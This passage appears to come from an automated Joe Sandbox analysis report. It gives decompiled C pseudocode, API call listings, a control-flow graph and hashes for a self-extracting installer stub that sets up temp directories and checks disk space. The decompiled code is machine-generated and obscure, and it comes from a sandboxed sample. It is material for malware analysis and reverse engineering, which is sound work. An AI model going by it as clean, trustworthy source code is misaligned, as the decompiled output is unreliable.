                                                                                                                                                                                                    																					if(_t59 != 0) {
                                                                                                                                                                                                    																						goto L45;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						_t60 = _v268;
                                                                                                                                                                                                    																						goto L42;
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t60 = _v268 + 1;
                                                                                                                                                                                                    																					_v265 = 0;
                                                                                                                                                                                                    																					_v268 = _t60;
                                                                                                                                                                                                    																					goto L42;
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                    																				_t65 = E00132630(0,  &_v268, 1);
                                                                                                                                                                                                    																				__eflags = _t65;
                                                                                                                                                                                                    																				if(_t65 != 0) {
                                                                                                                                                                                                    																					goto L28;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t67 = E0013597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                    																					__eflags = _t67;
                                                                                                                                                                                                    																					if(_t67 == 0) {
                                                                                                                                                                                                    																						goto L28;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						goto L33;
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			}
                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                    																			goto L28;
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L22;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L47;
                                                                                                                                                                                                    												L42:
                                                                                                                                                                                                    												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                    											} while (_t60 <= 0x5a);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										goto L43;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t101 = 1;
                                                                                                                                                                                                    										_t69 = E00135467(0x1391e4, 1, 3); // executed
                                                                                                                                                                                                    										__eflags = _t69;
                                                                                                                                                                                                    										if(_t69 != 0) {
                                                                                                                                                                                                    											goto L45;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t82 = 0x1391e4;
                                                                                                                                                                                                    											_t70 = E00132630(0, 0x1391e4, 1);
                                                                                                                                                                                                    											__eflags = _t70;
                                                                                                                                                                                                    											if(_t70 != 0) {
                                                                                                                                                                                                    												goto L19;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t101 = 1;
                                                                                                                                                                                                    												_t82 = 0x1391e4;
                                                                                                                                                                                                    												_t71 = E00135467(0x1391e4, 1, 1);
                                                                                                                                                                                                    												__eflags = _t71;
                                                                                                                                                                                                    												if(_t71 != 0) {
                                                                                                                                                                                                    													goto L45;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													do {
                                                                                                                                                                                                    														goto L19;
                                                                                                                                                                                                    														L43:
                                                                                                                                                                                                    														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                    														_push(4);
                                                                                                                                                                                                    														_t101 = 3;
                                                                                                                                                                                                    														_t82 =  &_v268;
                                                                                                                                                                                                    														_t44 = E0013597D(_t82, _t101, 1);
                                                                                                                                                                                                    														__eflags = _t44;
                                                                                                                                                                                                    													} while (_t44 != 0);
                                                                                                                                                                                                    													goto L2;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                    							if(_t35 != 0x5c) {
                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                    								_t72 = 1;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0x138b3f - _t35; // 0x0
                                                                                                                                                                                                    								_t72 = 0;
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t101 = 0;
                                                                                                                                                                                                    							_t73 = E00135467(0x138b3e, 0, _t72);
                                                                                                                                                                                                    							__eflags = _t73;
                                                                                                                                                                                                    							if(_t73 != 0) {
                                                                                                                                                                                                    								L45:
                                                                                                                                                                                                    								_t38 = 1;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t101 = 0x4be;
                                                                                                                                                                                                    								E001344B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                    								goto L2;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t101 = 0x4b1;
                                                                                                                                                                                                    						E001344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                    						 *0x139124 = 0x80070714;
                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t101 = 0x4b5;
                                                                                                                                                                                                    					E001344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					 *0x139124 = E00136285();
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					_t38 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L47:
                                                                                                                                                                                                    				return E00136CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                    			}





































                                                                                                                                                                                                    0x001355ab
                                                                                                                                                                                                    0x001355b2
                                                                                                                                                                                                    0x001355c9
                                                                                                                                                                                                    0x001355d5
                                                                                                                                                                                                    0x001355d9
                                                                                                                                                                                                    0x00135600
                                                                                                                                                                                                    0x00135605
                                                                                                                                                                                                    0x0013560a
                                                                                                                                                                                                    0x0013560c
                                                                                                                                                                                                    0x00135638
                                                                                                                                                                                                    0x00135641
                                                                                                                                                                                                    0x00135643
                                                                                                                                                                                                    0x00135645
                                                                                                                                                                                                    0x00135645
                                                                                                                                                                                                    0x0013564c
                                                                                                                                                                                                    0x00135652
                                                                                                                                                                                                    0x00135657
                                                                                                                                                                                                    0x00135659
                                                                                                                                                                                                    0x00135696
                                                                                                                                                                                                    0x0013569c
                                                                                                                                                                                                    0x0013589f
                                                                                                                                                                                                    0x001358a7
                                                                                                                                                                                                    0x001358ac
                                                                                                                                                                                                    0x001358b3
                                                                                                                                                                                                    0x001358b5
                                                                                                                                                                                                    0x001356a2
                                                                                                                                                                                                    0x001356a2
                                                                                                                                                                                                    0x001356a8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001356ae
                                                                                                                                                                                                    0x001356ae
                                                                                                                                                                                                    0x001356b9
                                                                                                                                                                                                    0x001356bf
                                                                                                                                                                                                    0x001356c1
                                                                                                                                                                                                    0x001356f3
                                                                                                                                                                                                    0x001356f3
                                                                                                                                                                                                    0x00135705
                                                                                                                                                                                                    0x0013570a
                                                                                                                                                                                                    0x00135711
                                                                                                                                                                                                    0x00135717
                                                                                                                                                                                                    0x00135724
                                                                                                                                                                                                    0x00135726
                                                                                                                                                                                                    0x00135729
                                                                                                                                                                                                    0x00135730
                                                                                                                                                                                                    0x00135737
                                                                                                                                                                                                    0x0013573d
                                                                                                                                                                                                    0x00135740
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013572b
                                                                                                                                                                                                    0x0013572b
                                                                                                                                                                                                    0x0013572e
                                                                                                                                                                                                    0x00135742
                                                                                                                                                                                                    0x00135742
                                                                                                                                                                                                    0x00135745
                                                                                                                                                                                                    0x0013576b
                                                                                                                                                                                                    0x0013576b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135747
                                                                                                                                                                                                    0x00135747
                                                                                                                                                                                                    0x0013574d
                                                                                                                                                                                                    0x0013574f
                                                                                                                                                                                                    0x00135771
                                                                                                                                                                                                    0x00135771
                                                                                                                                                                                                    0x00135773
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135751
                                                                                                                                                                                                    0x00135751
                                                                                                                                                                                                    0x00135753
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135755
                                                                                                                                                                                                    0x0013575b
                                                                                                                                                                                                    0x00135760
                                                                                                                                                                                                    0x00135762
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135764
                                                                                                                                                                                                    0x00135764
                                                                                                                                                                                                    0x00135769
                                                                                                                                                                                                    0x0013577e
                                                                                                                                                                                                    0x0013577e
                                                                                                                                                                                                    0x00135781
                                                                                                                                                                                                    0x00135788
                                                                                                                                                                                                    0x0013578d
                                                                                                                                                                                                    0x0013578f
                                                                                                                                                                                                    0x001357b2
                                                                                                                                                                                                    0x001357b8
                                                                                                                                                                                                    0x001357bd
                                                                                                                                                                                                    0x001357bf
                                                                                                                                                                                                    0x001357cd
                                                                                                                                                                                                    0x001357cd
                                                                                                                                                                                                    0x001357dd
                                                                                                                                                                                                    0x001357e3
                                                                                                                                                                                                    0x001357ef
                                                                                                                                                                                                    0x001357f5
                                                                                                                                                                                                    0x001357f8
                                                                                                                                                                                                    0x0013580a
                                                                                                                                                                                                    0x0013580a
                                                                                                                                                                                                    0x001357fa
                                                                                                                                                                                                    0x00135802
                                                                                                                                                                                                    0x00135802
                                                                                                                                                                                                    0x0013580d
                                                                                                                                                                                                    0x0013580f
                                                                                                                                                                                                    0x00135830
                                                                                                                                                                                                    0x00135836
                                                                                                                                                                                                    0x0013583d
                                                                                                                                                                                                    0x0013584b
                                                                                                                                                                                                    0x00135851
                                                                                                                                                                                                    0x00135855
                                                                                                                                                                                                    0x0013585a
                                                                                                                                                                                                    0x0013585c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013585e
                                                                                                                                                                                                    0x0013585e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013585e
                                                                                                                                                                                                    0x00135811
                                                                                                                                                                                                    0x00135817
                                                                                                                                                                                                    0x00135819
                                                                                                                                                                                                    0x0013581f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013581f
                                                                                                                                                                                                    0x00135791
                                                                                                                                                                                                    0x00135797
                                                                                                                                                                                                    0x0013579c
                                                                                                                                                                                                    0x0013579e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001357a0
                                                                                                                                                                                                    0x001357a9
                                                                                                                                                                                                    0x001357ae
                                                                                                                                                                                                    0x001357b0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001357b0
                                                                                                                                                                                                    0x0013579e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135769
                                                                                                                                                                                                    0x00135762
                                                                                                                                                                                                    0x00135753
                                                                                                                                                                                                    0x0013574f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013572e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135864
                                                                                                                                                                                                    0x00135864
                                                                                                                                                                                                    0x00135864
                                                                                                                                                                                                    0x00135717
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001356c3
                                                                                                                                                                                                    0x001356c5
                                                                                                                                                                                                    0x001356c9
                                                                                                                                                                                                    0x001356ce
                                                                                                                                                                                                    0x001356d0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001356d6
                                                                                                                                                                                                    0x001356d6
                                                                                                                                                                                                    0x001356d8
                                                                                                                                                                                                    0x001356dd
                                                                                                                                                                                                    0x001356df
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001356e1
                                                                                                                                                                                                    0x001356e2
                                                                                                                                                                                                    0x001356e4
                                                                                                                                                                                                    0x001356e6
                                                                                                                                                                                                    0x001356eb
                                                                                                                                                                                                    0x001356ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001356f3
                                                                                                                                                                                                    0x001356f3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013586c
                                                                                                                                                                                                    0x00135878
                                                                                                                                                                                                    0x0013587e
                                                                                                                                                                                                    0x00135882
                                                                                                                                                                                                    0x00135883
                                                                                                                                                                                                    0x00135889
                                                                                                                                                                                                    0x0013588e
                                                                                                                                                                                                    0x0013588e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135896
                                                                                                                                                                                                    0x001356ed
                                                                                                                                                                                                    0x001356df
                                                                                                                                                                                                    0x001356d0
                                                                                                                                                                                                    0x001356c1
                                                                                                                                                                                                    0x001356a8
                                                                                                                                                                                                    0x0013565b
                                                                                                                                                                                                    0x0013565b
                                                                                                                                                                                                    0x0013565d
                                                                                                                                                                                                    0x00135669
                                                                                                                                                                                                    0x00135669
                                                                                                                                                                                                    0x0013565f
                                                                                                                                                                                                    0x0013565f
                                                                                                                                                                                                    0x00135665
                                                                                                                                                                                                    0x00135667
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135667
                                                                                                                                                                                                    0x0013566c
                                                                                                                                                                                                    0x00135673
                                                                                                                                                                                                    0x00135678
                                                                                                                                                                                                    0x0013567a
                                                                                                                                                                                                    0x0013589b
                                                                                                                                                                                                    0x0013589b
                                                                                                                                                                                                    0x00135680
                                                                                                                                                                                                    0x00135685
                                                                                                                                                                                                    0x0013568c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013568c
                                                                                                                                                                                                    0x0013567a
                                                                                                                                                                                                    0x0013560e
                                                                                                                                                                                                    0x00135613
                                                                                                                                                                                                    0x0013561a
                                                                                                                                                                                                    0x00135620
                                                                                                                                                                                                    0x00135626
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135626
                                                                                                                                                                                                    0x001355db
                                                                                                                                                                                                    0x001355e0
                                                                                                                                                                                                    0x001355e7
                                                                                                                                                                                                    0x001355f1
                                                                                                                                                                                                    0x001355f6
                                                                                                                                                                                                    0x001355f6
                                                                                                                                                                                                    0x001355f6
                                                                                                                                                                                                    0x001358b7
                                                                                                                                                                                                    0x001358c7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001355CF
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00135638
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0013564C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00135620
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                      • Part of subcall function 00136285: GetLastError.KERNEL32(00135BBC), ref: 00136285
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001356B9
                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0013571E
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00135737
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001357CD
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001357EF
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00135802
                                                                                                                                                                                                      • Part of subcall function 00132630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00132654
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00135830
                                                                                                                                                                                                      • Part of subcall function 00136517: FindResourceA.KERNEL32(00130000,000007D6,00000005), ref: 0013652A
                                                                                                                                                                                                      • Part of subcall function 00136517: LoadResource.KERNEL32(00130000,00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00136538
                                                                                                                                                                                                      • Part of subcall function 00136517: DialogBoxIndirectParamA.USER32(00130000,00000000,00000547,001319E0,00000000), ref: 00136557
                                                                                                                                                                                                      • Part of subcall function 00136517: FreeResource.KERNEL32(00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00136560
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00135878
                                                                                                                                                                                                      • Part of subcall function 0013597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001359A8
                                                                                                                                                                                                      • Part of subcall function 0013597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001359AF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                    • API String ID: 2436801531-3708386018
                                                                                                                                                                                                    • Opcode ID: ef0ca056da5c065a4c20882a960845e6e9362beabc311601c20d6bc61acdb4c1
                                                                                                                                                                                                    • Instruction ID: ba5e73d743f7e84031998b5afd4668f2c17a3f27fb287f5abf5ad22266e5a210
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef0ca056da5c065a4c20882a960845e6e9362beabc311601c20d6bc61acdb4c1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A813EB1A04A04ABDB24AB358D85BFE776F9F70B10F4400A5F5C6E3191EFB08DC58A60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 324 13597d-1359b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 1359bb-1359d8 call 1344b9 call 136285 324->325 326 1359dd-135a1b GetDiskFreeSpaceA 324->326 343 135c05-135c14 call 136ce0 325->343 328 135ba1-135bde memset call 136285 GetLastError FormatMessageA 326->328 329 135a21-135a4a MulDiv 326->329 339 135be3-135bfc call 1344b9 SetCurrentDirectoryA 328->339 329->328 332 135a50-135a6c GetVolumeInformationA 329->332 335 135ab5-135aca SetCurrentDirectoryA 332->335 336 135a6e-135ab0 memset call 136285 GetLastError FormatMessageA 332->336 337 135acc-135ad1 335->337 336->339 341 135ad3-135ad8 337->341 342 135ae2-135ae4 337->342 351 135c02 339->351 341->342 347 135ada-135ae0 341->347 349 135ae7-135af8 342->349 350 135ae6 342->350 347->337 347->342 353 135af9-135afb 349->353 350->349 354 135c04 351->354 355 135b05-135b08 353->355 356 135afd-135b03 353->356 354->343 357 135b20-135b27 355->357 358 135b0a-135b1b call 1344b9 355->358 356->353 356->355 360 135b52-135b5b 357->360 361 135b29-135b33 357->361 358->351 362 135b62-135b6d 360->362 361->360 364 135b35-135b50 361->364 365 135b76-135b7d 362->365 366 135b6f-135b74 362->366 364->362 368 135b83 365->368 369 135b7f-135b81 365->369 367 135b85 366->367 370 135b87-135b94 call 13268b 367->370 371 135b96-135b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                    			E0013597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v788;
                                                                                                                                                                                                    				long _v792;
                                                                                                                                                                                                    				long _v796;
                                                                                                                                                                                                    				long _v800;
                                                                                                                                                                                                    				signed int _v804;
                                                                                                                                                                                                    				long _v808;
                                                                                                                                                                                                    				int _v812;
                                                                                                                                                                                                    				long _v816;
                                                                                                                                                                                                    				long _v820;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                                                    				signed short _t78;
                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                    				int _t102;
                                                                                                                                                                                                    				unsigned int _t103;
                                                                                                                                                                                                    				unsigned int _t105;
                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                    				long _t112;
                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                    				signed int _t119;
                                                                                                                                                                                                    				signed int _t120;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t114 = __edi;
                                                                                                                                                                                                    				_t46 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                    				_v804 = __edx;
                                                                                                                                                                                                    				_t118 = __ecx;
                                                                                                                                                                                                    				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                    				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                    				if(_t50 != 0) {
                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                    					_v796 = 0;
                                                                                                                                                                                                    					_v792 = 0;
                                                                                                                                                                                                    					_v800 = 0;
                                                                                                                                                                                                    					_v808 = 0;
                                                                                                                                                                                                    					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                    					__eflags = _t55;
                                                                                                                                                                                                    					if(_t55 == 0) {
                                                                                                                                                                                                    						L29:
                                                                                                                                                                                                    						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                    						 *0x139124 = E00136285();
                                                                                                                                                                                                    						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                    						_t110 = 0x4b0;
                                                                                                                                                                                                    						L30:
                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                    						E001344B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                    						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                    						L31:
                                                                                                                                                                                                    						_t66 = 0;
                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                    						L32:
                                                                                                                                                                                                    						_pop(_t114);
                                                                                                                                                                                                    						goto L33;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t69 = _v792 * _v796;
                                                                                                                                                                                                    					_v812 = _t69;
                                                                                                                                                                                                    					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                    					__eflags = _t116;
                                                                                                                                                                                                    					if(_t116 == 0) {
                                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                    					__eflags = _t73;
                                                                                                                                                                                                    					if(_t73 != 0) {
                                                                                                                                                                                                    						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                    						_t101 =  &_v16;
                                                                                                                                                                                                    						_t111 = 6;
                                                                                                                                                                                                    						_t119 = _t118 - _t101;
                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                    							__eflags = _t22;
                                                                                                                                                                                                    							if(_t22 == 0) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                    							__eflags = _t87;
                                                                                                                                                                                                    							if(_t87 == 0) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *_t101 = _t87;
                                                                                                                                                                                                    							_t101 = _t101 + 1;
                                                                                                                                                                                                    							_t111 = _t111 - 1;
                                                                                                                                                                                                    							__eflags = _t111;
                                                                                                                                                                                                    							if(_t111 != 0) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t111;
                                                                                                                                                                                                    						if(_t111 == 0) {
                                                                                                                                                                                                    							_t101 = _t101 - 1;
                                                                                                                                                                                                    							__eflags = _t101;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *_t101 = 0;
                                                                                                                                                                                                    						_t112 = 0x200;
                                                                                                                                                                                                    						_t102 = _v812;
                                                                                                                                                                                                    						_t78 = 0;
                                                                                                                                                                                                    						_t118 = 8;
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							__eflags = _t102 - _t112;
                                                                                                                                                                                                    							if(_t102 == _t112) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t112 = _t112 + _t112;
                                                                                                                                                                                                    							_t78 = _t78 + 1;
                                                                                                                                                                                                    							__eflags = _t78 - _t118;
                                                                                                                                                                                                    							if(_t78 < _t118) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t78 - _t118;
                                                                                                                                                                                                    						if(_t78 != _t118) {
                                                                                                                                                                                                    							__eflags =  *0x139a34 & 0x00000008;
                                                                                                                                                                                                    							if(( *0x139a34 & 0x00000008) == 0) {
                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                    								_t103 =  *0x139a38; // 0x0
                                                                                                                                                                                                    								_t110 =  *((intOrPtr*)(0x1389e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                    								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                    								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                    									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                    									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                    										__eflags = _t103 - _t116;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										__eflags = _t110 - _t116;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									 *0x139124 = 0;
                                                                                                                                                                                                    									_t66 = 1;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t66 = E0013268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                    							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t105 =  *0x139a38; // 0x0
